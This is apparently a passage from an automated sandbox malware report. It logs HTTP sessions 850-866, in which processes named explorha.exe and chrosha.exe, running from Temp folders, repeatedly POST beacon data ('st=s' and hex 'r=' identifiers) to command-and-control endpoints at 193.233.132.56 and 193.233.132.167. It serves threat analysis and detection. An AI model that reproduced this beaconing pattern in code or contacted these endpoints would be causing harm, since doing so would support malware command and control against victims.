                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      850192.168.2.550699193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:53.275405884 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:53.519620895 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      851192.168.2.550700193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:53.543054104 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:53.791717052 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      852192.168.2.550701193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:53.778939962 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:54.028039932 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      853192.168.2.550702193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:54.144115925 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:54.387222052 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      854192.168.2.550703193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:54.382502079 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:54.629329920 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      855192.168.2.550704193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:54.637356043 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:54.886517048 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      856192.168.2.550705193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:54.888698101 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:55.144784927 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      857192.168.2.550706193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:55.247536898 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:55.496339083 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      858192.168.2.550707193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:55.512242079 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:55.759602070 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      859192.168.2.550708193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:55.745868921 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:55.992925882 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      860192.168.2.550709193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:56.011627913 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:56.263961077 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      861192.168.2.550710193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:56.356065035 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:56.605307102 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      862192.168.2.550711193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:56.622217894 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:56.870923042 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      863192.168.2.550712193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:56.852037907 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:57.098959923 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      864192.168.2.550713193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:57.126935959 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:57.378396034 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      865192.168.2.550714193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:57.463171959 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:57.711149931 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      866192.168.2.550715193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:57.742928982 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:57.990591049 CEST219INHTTP/1.1 200 OK
